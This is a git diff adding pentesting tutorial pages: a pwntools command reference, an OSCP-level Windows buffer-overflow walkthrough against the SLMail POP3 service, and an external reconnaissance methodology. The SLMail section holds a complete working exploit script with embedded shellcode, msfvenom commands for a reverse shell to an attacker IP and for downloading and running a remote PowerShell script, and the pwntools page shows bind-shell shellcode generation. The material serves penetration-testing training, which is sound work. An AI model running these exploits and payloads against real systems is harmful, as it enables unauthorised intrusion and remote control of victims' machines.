**ATL+f7** \(import python plugin in IDA\) and select the python plugin. + +This will resolve the names of the functions. + diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md new file mode 100644 index 00000000000..1fc99b4e277 --- /dev/null +++ b/exploiting/tools/pwntools.md @@ -0,0 +1,173 @@ +# PwnTools + +```text +pip3 install pwntools +``` + +## Pwn asm + +Get opcodes from line or file. + +```text +pwn asm "jmp esp" +pwn asm -i +``` + +**Can select:** + +* output type \(raw,hex,string,elf\) +* output file context \(16,32,64,linux,windows...\) +* avoid bytes \(new lines, null, a list\) +* select encoder debug shellcode using gdb run the output + +## **Pwn checksec** + +Checksec script + +```text +pwn checksec +``` + +## Pwn constgrep + +## Pwn cyclic + +Get a pattern + +```text +pwn cyclic 3000 +pwn cyclic -l faad +``` + +**Can select:** + +* The used alphabet \(lowercase chars by default\) +* Length of uniq pattern \(default 4\) +* context \(16,32,64,linux,windows...\) +* Take the offset \(-l\) + +## Pwn debug + +Attach GDB to a process + +```text +pwn debug --exec /bin/bash +pwn debug --pid 1234 +pwn debug --process bash +``` + +**Can select:** + +* By executable, by name or by pid context \(16,32,64,linux,windows...\) +* gdbscript to execute +* sysrootpath + +## Pwn disablenx + +Disable nx of a binary + +```text +pwn disablenx +``` + +## Pwn disasm + +Disas hex opcodes + +```text +pwn disasm ffe4 +``` + +**Can select:** + +* context \(16,32,64,linux,windows...\) +* base addres +* color\(default\)/no color + +## Pwn elfdiff + +Print differences between 2 fiels + +```text +pwn elfdiff +``` + +## Pwn hex + +Get hexadecimal representation + +```bash +pwn hex hola #Get hex of "hola" ascii +``` + +## Pwn phd + +Get hexdump + +```text +pwn phd +``` + + **Can select:** + +* Number of bytes to show +* Number of bytes per line highlight byte +* Skip bytes at beginning + +## Pwn pwnstrip + +## Pwn scrable + +## Pwn shellcraft + +Get shellcodes + +```text +pwn shellcraft -l #List shellcodes +pwn shellcraft -l amd #Shellcode with amd in the name +pwn shellcraft -f hex amd64.linux.sh #Create in C and run +pwn shellcraft -r amd64.linux.sh #Run to test. Get shell +pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port +``` + +**Can select:** + +* shellcode and arguments for the shellcode +* Out file +* output format +* debug \(attach dbg to shellcode\) +* before \(debug trap before code\) +* after +* avoid using opcodes \(default: not null and new line\) +* Run the shellcode +* Color/no color +* list syscalls +* list possible shellcodes +* Generate ELF as a shared library + +## Pwn template + +Get a python template + +```text +pwn template +``` + +**Can select:** host, port, user, pass, path and quiet + +## Pwn unhex + +From hex to string + +```text +pwn unhex 686f6c61 +``` + +## Pwn update + +To update pwntools + +```text +pwn update +``` + diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md new file mode 100644 index 00000000000..8951ff4aac7 --- /dev/null +++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md @@ -0,0 +1,259 @@ +# Windows Exploiting \(Basic Guide - OSCP lvl\) + +## **Start installing the SLMail service** + +## Restart SLMail service + +Every time you need to **restart the service SLMail** you can do it using the windows console: + +```text +net start slmail +``` + +![](../.gitbook/assets/image%20%28134%29.png) + +## Very basic python exploit template + +```python +#!/usr/bin/python + +import socket + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +ip = '10.11.25.153' +port = 110 + +buffer = 'A' * 2700 +try: + print "\nLaunching exploit..." + s.connect((ip, port)) + data = s.recv(1024) + s.send('USER username' +'\r\n') + data = s.recv(1024) + s.send('PASS ' + buffer + '\r\n') + print "\nFinished!." +except: + print "Could not connect to "+ip+":"+port +``` + +## **Change Immunity Debugger Font** + +Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` + +## **Attach the proces to Immunity Debugger:** + +**File --> Attach** + +![](../.gitbook/assets/image%20%28111%29.png) + +**And press START button** + +## **Send the exploit and check if EIP is affected:** + +![](../.gitbook/assets/image%20%2822%29.png) + +Every time you break the service you should restart it as is indicated in the beginnig of this page. + +## Create a pattern to modify the EIP + +The pattern should be as big as the buffer you used to broke the service previously. + +![](../.gitbook/assets/image%20%28283%29.png) + +```text +/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 +``` + +Change the buffer of the exploit and set the pattern and lauch the exploit. + +A new crash should appeard, but with a different EIP address: + +![](../.gitbook/assets/image%20%2827%29.png) + +Check if the address was in your pattern: + +![](../.gitbook/assets/image%20%281%29.png) + +```text +/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438 +``` + +Looks like **we can modify the EIP in offset 2606** of the buffer. + +Check it modifing the buffer of the exploit: + +```text +buffer = 'A'*2606 + 'BBBB' + 'CCCC' +``` + +With this buffer the EIP crashed should point to 42424242 \("BBBB"\) + +![](../.gitbook/assets/image%20%28296%29.png) + +![](../.gitbook/assets/image%20%28336%29.png) + +Looks like it is working. + +## Check for Shellcode space inside the stack + +600B should be enough for any powerfull shellcode. + +Lets change the bufer: + +```text +buffer = 'A'*2606 + 'BBBB' + 'C'*600 +``` + +launch the new exploit and check the EBP and the length of the usefull shellcode + +![](../.gitbook/assets/image%20%28323%29.png) + +![](../.gitbook/assets/image%20%28299%29.png) + +You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here. + +In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough. + +## Check for bad chars + +Change again the buffer: + +```text +badchars = ( +"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" +"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" +"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" +"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" +"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" +"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" +"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" +"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" +"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" +"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" +"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" +"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" +"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" +"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" +"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" +"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" +) +buffer = 'A'*2606 + 'BBBB' + badchars +``` + +The badchars starts in 0x01 because 0x00 is almost always bad. + +Execute repeatedly the exploit with this new buffer delenting the chars that are found to be useless:. + +For example: + +In this case you can see that **you shouldn't use the char 0x0A** \(nothing is saved in memory since the char 0x09\). + +![](../.gitbook/assets/image%20%28217%29.png) + +In this case you can see that **the char 0x0D is avoided**: + +![](../.gitbook/assets/image%20%2870%29.png) + +## Find a JMP ESP as a return address + +Using: + +```text +!mona modules #Get protections, look for all false except last one (Dll of SO) +``` + +You will **list the memory maps**. Search for some DLl that has: + +* **Rebase: False** +* **SafeSEH: False** +* **ASLR: False** +* **NXCompat: False** +* **OS Dll: True** + +![](../.gitbook/assets/image%20%28280%29.png) + +Now, inside this memory you should find some JMP ESP bytes, to do that execute: + +```text +!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP) +!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case +``` + +**Then, if some address is found, choose one that don't contain any badchar:** + +![](../.gitbook/assets/image%20%28124%29.png) + +**In this case, for example:** _**0x5f4a358f**_ + +## Create shellcode + +```text +msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d' +msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d' +``` + +If the exploit is not working but it should \(you can see with ImDebg that the shellcode is reached\), try to create other shellcodes \(msfvenom with create different shellcodes for the same parameters\). + +**Add some NOPS at the beginning** of the shellcode and use it and the return address to JMP ESP, and finish the exploit: + +```bash +#!/usr/bin/python + +import socket + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +ip = '10.11.25.153' +port = 110 + +shellcode = ( +"\xb8\x30\x3f\x27\x0c\xdb\xda\xd9\x74\x24\xf4\x5d\x31\xc9\xb1" +"\x52\x31\x45\x12\x83\xed\xfc\x03\x75\x31\xc5\xf9\x89\xa5\x8b" +"\x02\x71\x36\xec\x8b\x94\x07\x2c\xef\xdd\x38\x9c\x7b\xb3\xb4" +"\x57\x29\x27\x4e\x15\xe6\x48\xe7\x90\xd0\x67\xf8\x89\x21\xe6" +"\x7a\xd0\x75\xc8\x43\x1b\x88\x09\x83\x46\x61\x5b\x5c\x0c\xd4" +"\x4b\xe9\x58\xe5\xe0\xa1\x4d\x6d\x15\x71\x6f\x5c\x88\x09\x36" +"\x7e\x2b\xdd\x42\x37\x33\x02\x6e\x81\xc8\xf0\x04\x10\x18\xc9" +"\xe5\xbf\x65\xe5\x17\xc1\xa2\xc2\xc7\xb4\xda\x30\x75\xcf\x19" +"\x4a\xa1\x5a\xb9\xec\x22\xfc\x65\x0c\xe6\x9b\xee\x02\x43\xef" +"\xa8\x06\x52\x3c\xc3\x33\xdf\xc3\x03\xb2\x9b\xe7\x87\x9e\x78" +"\x89\x9e\x7a\x2e\xb6\xc0\x24\x8f\x12\x8b\xc9\xc4\x2e\xd6\x85" +"\x29\x03\xe8\x55\x26\x14\x9b\x67\xe9\x8e\x33\xc4\x62\x09\xc4" +"\x2b\x59\xed\x5a\xd2\x62\x0e\x73\x11\x36\x5e\xeb\xb0\x37\x35" +"\xeb\x3d\xe2\x9a\xbb\x91\x5d\x5b\x6b\x52\x0e\x33\x61\x5d\x71" +"\x23\x8a\xb7\x1a\xce\x71\x50\x2f\x04\x79\x89\x47\x18\x79\xd8" +"\xcb\x95\x9f\xb0\xe3\xf3\x08\x2d\x9d\x59\xc2\xcc\x62\x74\xaf" +"\xcf\xe9\x7b\x50\x81\x19\xf1\x42\x76\xea\x4c\x38\xd1\xf5\x7a" +"\x54\xbd\x64\xe1\xa4\xc8\x94\xbe\xf3\x9d\x6b\xb7\x91\x33\xd5" +"\x61\x87\xc9\x83\x4a\x03\x16\x70\x54\x8a\xdb\xcc\x72\x9c\x25" +"\xcc\x3e\xc8\xf9\x9b\xe8\xa6\xbf\x75\x5b\x10\x16\x29\x35\xf4" +"\xef\x01\x86\x82\xef\x4f\x70\x6a\x41\x26\xc5\x95\x6e\xae\xc1" +"\xee\x92\x4e\x2d\x25\x17\x7e\x64\x67\x3e\x17\x21\xf2\x02\x7a" +"\xd2\x29\x40\x83\x51\xdb\x39\x70\x49\xae\x3c\x3c\xcd\x43\x4d" +"\x2d\xb8\x63\xe2\x4e\xe9" +) + +buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode +try: + print "\nLaunching exploit..." + s.connect((ip, port)) + data = s.recv(1024) + s.send('USER username' +'\r\n') + data = s.recv(1024) + s.send('PASS ' + buffer + '\r\n') + print "\nFinished!." +except: + print "Could not connect to "+ip+":"+port +``` + +{% hint style="warning" %} +There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode +{% endhint %} + +## Improving the shellcode + +Add this parameters: + +```text +EXITFUNC=thread -e x86/shikata_ga_nai +``` + diff --git a/external-recon-methodology.md b/external-recon-methodology.md new file mode 100644 index 00000000000..a89f6583eec --- /dev/null +++ b/external-recon-methodology.md @@ -0,0 +1,365 @@ +# External Recon Methodology + +{% hint style="danger" %} +Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? +[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!** +{% endhint %} + +If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. + +## Assets discoveries + +> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns. + +The goal of this phase is to obtain all the **companies owned by the main company** and then all the **assets** of these companies. To do so, we are going to: + +1. Find the acquisitions of the main company, this will give us the companies inside the scope. +2. Find the ASN \(if any\) of each company, this will give us the IP ranges owned by each company +3. Use reverse whois lookups to search for other entries \(organisation names, domains...\) related to the first one \(this can be done recursively\) +4. Use other techniques like shodan `org`and `ssl`filters to search for other assets \(the `ssl` trick can be done recursively\). + +### Acquisitions + +First of all, we need to know which **other companies are owned by the main company**. +One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com/), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one. +Other option is to visit the **Wikipedia** page of the main company and search for **acquisitions**. + +> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets. + +### ASNs + +An autonomous system number \(**ASN**\) is a **unique number** assigned to an **autonomous system** \(AS\) by the **Internet Assigned Numbers Authority \(IANA\)**. +An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators. + +It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs. +**\*\*You can search by** company name**, by** IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net/)**. +Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net/) **\(Africa\),** [**Arin**](https://www.arin.net/about/welcome/region/)**\(North America\),** [**APNIC**](https://www.apnic.net/) **\(Asia\),** [**LACNIC**](https://www.lacnic.net/) **\(Latin America\),** [**RIPE NCC**](https://www.ripe.net/) **\(Europe\). Anyway, probably all the** useful information **\(IP ranges and Whois\)** appears already in the first link\*\*. + +```bash +#You can try "automate" this with amass, but it's not very recommended +amass intel -org tesla +amass intel -asn 8911,50313,394161 +``` + +You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com/) \(it has free API\). +You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com/). + +### Looking for vulnerabilities + +At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts. +Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) **\*\*or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**. +Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce\*\* services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). + +## Domains + +> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope. + +_Please, note that in the following purposed techniques you can also find subdomains and that information shouldn't be underrated._ + +First of all you should look for the **main domain**\(s\) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_. + +### Reverse DNS + +As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server \(1.1.1.1, 8.8.8.8\) + +```bash +dnsrecon -r -n #DNS reverse of all of the addresses +dnsrecon -d facebook.com -r 157.240.221.35/24 #Using facebooks dns +dnsrecon -r 157.240.221.35/24 -n 1.1.1.1 #Using cloudflares dns +dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns +``` + +For this to work, the administrator has to enable manually the PTR. +You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com/) + +### Reverse Whois \(loop\) + +Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** \(for example other whois registries where the same email appears\). +You can use online tools like: + +* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free** +* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Free** +* [https://www.reversewhois.io/](https://www.reversewhois.io/) - **Free** +* \*\*\*\*[https://www.whoxy.com/](https://www.whoxy.com/) - **Free** web, not free API. +* \*\*\*\*[http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com/) - Not free +* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free \(only **100 free** searches\) +* [https://www.domainiq.com/](https://www.domainiq.com/) - Not Free + +You can automate this task using [**DomLink** ](https://github.com/vysecurity/DomLink)\(requires a whoxy API key\). +You can also perform some automatic reverse whois discovery with [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois` + +**Note that you can use this technique to discover more domain names every time you find a new domain.** + +### Trackers + +If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**. +For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages. + +There are some pages that let you search by these trackers and more: + +* [**BuiltWith**](https://builtwith.com/)\*\*\*\* +* \*\*\*\*[**Sitesleuth**](https://www.sitesleuth.io/)\*\*\*\* +* \*\*\*\*[**Publicwww**](https://publicwww.com/)\*\*\*\* +* \*\*\*\*[**SpyOnWeb**](http://spyonweb.com/)\*\*\*\* + +### **Favicon** + +Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here’s how to use it: + +```bash +cat my_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"' > targets.txt +python3 favihash.py -f https://target/favicon.ico -t targets.txt -s +``` + +![favihash - discover domains with the same favicon icon hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg) + +Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target. + +### Other ways + +**Note that you can use this technique to discover more domain names every time you find a new domain.** + +#### Shodan + +As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate. + +You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"` + +#### Google + +Go to the main page an find something that identifies the company, like the copyright \("Tesla © 2020"\). Search for that in google or other browsers to find possible new domains/pages. + +#### Assetfinder + +[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing. + +### Looking for vulnerabilities + +Check for some [domain takeover](pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it \(if cheap enough\) and let know the company. + +If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**. +_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ + +## Subdomains + +> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies. + +It's time to find all the possible subdomains of each found domain. + +### DNS + +Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** \(If vulnerable, you should report it\). + +```bash +dnsrecon -a -d tesla.com +``` + +### OSINT + +The fastest way to obtain a lot of subdomains is search in external sources. I'm not going to discuss which sources are the bests and how to use them, but you can find here several utilities: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html) + +A really good place to search for subdomains is [https://crt.sh/](https://crt.sh/). + +The most used tools are [**Amass**](https://github.com/OWASP/Amass)**,** [**subfinder**](https://github.com/projectdiscovery/subfinder)**,** [**findomain**](https://github.com/Edu4rdSHL/findomain/)**,** [**OneForAll**](https://github.com/shmilylty/OneForAll/blob/master/README.en.md)**,** [**assetfinder**](https://github.com/tomnomnom/assetfinder)**,** [**Sudomy**](https://github.com/Screetsec/Sudomy)**.** I would recommend to start using them configuring the API keys, and then start testing other tools or possibilities. + +```bash +amass enum [-active] [-ip] -d tesla.com +./subfinder-linux-amd64 -d tesla.com [-silent] +./findomain-linux -t tesla.com [--quiet] +python3 oneforall.py --target tesla.com [--dns False] [--req False] run +assetfinder --subs-only +``` + +Another possibly interesting tool is [**gau**](https://github.com/lc/gau)**.** It fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain. + +#### [chaos.projectdiscovery.io](https://chaos.projectdiscovery.io/#/) + +This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list) + +You could also find subdomains scrapping the web pages and parsing them \(including JS files\) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper). + +#### RapidDNS + +Quickly find subdomains using [RapidDNS](https://rapiddns.io/) API \(from [link](https://twitter.com/Verry__D/status/1282293265597779968)\): + +```text +rapiddns(){ +curl -s "https://rapiddns.io/subdomain/$1?full=1" \ + | grep -oP '_blank">\K[^<]*' \ + | grep -v http \ + | sort -u +} +``` + +#### Shodan + +You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following: + +* http.html:”dev-int.bigcompanycdn.com” +* http.html:”[https://dev-int-bigcompanycdn.com”](https://dev-int-bigcompanycdn.com”) + +### DNS Brute force + +Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names. +The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\). + +For this action you will need some common subdomains lists like: + +* [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) +* [https://github.com/pentester-io/commonspeak](https://github.com/pentester-io/commonspeak) + +{% code title="Gobuster bruteforcing dns" %} +```bash +gobuster dns -d mysite.com -t 50 -w subdomains.txt +``` +{% endcode %} + +For **massdns** you will need to pass as argument the file will all the **possible well formed subdomains** you want to bruteforce and list of DNS resolvers to use. Some projects that use massdns as base and provides better results by checking massdns results are [**shuffledns**](https://github.com/projectdiscovery/shuffledns) **and** [**puredns**](https://github.com/d3mondev/puredns)**.** + +```bash +sed 's/$/.domain.com/' subdomains.txt > bf-subdomains.txt +./massdns -r resolvers.txt -w /tmp/results.txt bf-subdomains.txt +grep -E "tesla.com. [0-9]+ IN A .+" /tmp/results.txt + +shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt +puredns bruteforce all.txt domain.com +``` + +Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning \(DNS poisoning for example\) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them. + +### VHosts + +#### IP VHosts + +You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter) + +#### Brute Force + +If you suspect that some subdomain can be hidden in a web server you could try to brute force it: + +```bash +gobuster vhost -u https://mysite.com -t 50 -w subdomains.txt + +wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.example.com" -u http://example.com -t 100 + +#From https://github.com/allyshka/vhostbrute +vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com" --vhosts="vhosts_full.list" +``` + +{% hint style="info" %} +With this technique you may even be able to access internal/hidden endpoints. +{% endhint %} + +### CORS Brute Force + +Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**. + +```bash +ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body +``` + +### DNS Brute Force v2 + +Once you have finished looking for subdomains you can use [**dnsgen** ](https://github.com/ProjectAnte/dnsgen)and [**altdns**](https://github.com/infosec-au/altdns) to generate possible permutations of the discovered subdomains and use again **massdns** and **gobuster** to search new domains. + +### Buckets Brute Force + +While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](pentesting/pentesting-web/buckets/)**.** +Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](pentesting/pentesting-web/buckets/). + +### Monitorization + +You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does. + +### Looking for vulnerabilities + +Check for possible [**subdomain takeovers**](pentesting-web/domain-subdomain-takeover.md#subdomain-takeover). +If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](pentesting/pentesting-web/buckets/). + +If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**. +_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ + +## Web servers hunting + +> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers. + +In the previous steps probably you have already perform some **recon to the IPs and domains discovered**, so you may **already found all the possible web servers**. However, if you haven't we are now going to see some **fast tricks to search for web servers** inside the scope. + +Please, note that this will be **oriented to search for web apps**, you should **perform the vulnerability** and **port scanning** also \(**if allowed** by the scope\). + +A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](pentesting/pentesting-network/#http-port-discovery). +Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe) **and** [**fprobe**](https://github.com/theblackturtle/fprobe). You just pass a list of domains and it will try to connect to port 80 \(http\) and 443 \(https\). You can additional indicate to try other ports: + +```bash +cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 and 443 +cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443 +``` + +### Screenshots + +Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just **taking a look** to the **main page** of all of them you could find **weird** endpoints more **prone** to be **vulnerable**. + +To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), **\*\*\[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**, **\[**shutter**\]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**\) \*\***or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** + +## Recapitulation 1 + +> Congratulations! At this point you have already perform all the basic enumeration. Yes, it's basic because a lot more enumeration can be done \(will see more tricks later\). +> Do you know that the BBs experts recommends to spend only 10-15mins in this phase? But don't worry, one you have practice you will do this even faster than that. + +So you have already: + +1. Found all the **companies** inside the scope +2. Found all the **assets** belonging to the companies \(and perform some vuln scan if in scope\) +3. Found all the **domains** belonging to the companies +4. Found all the **subdomains** of the domains \(any subdomain takeover?\) +5. Found all the **web servers** and took a **screenshot** of them \(anything weird worth a deeper look?\) + +Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** \(you can see a [guide for that here](pentesting/pentesting-network/)\), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open \(this book already contains tons of information about possible vulnerabilities on a lot of common services\). **But, don't forget that if the scope allows it, you should give it a try.** + +## **Bug hunting OSINT related information** + +Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits. + +### Api keys leaks in github + +* 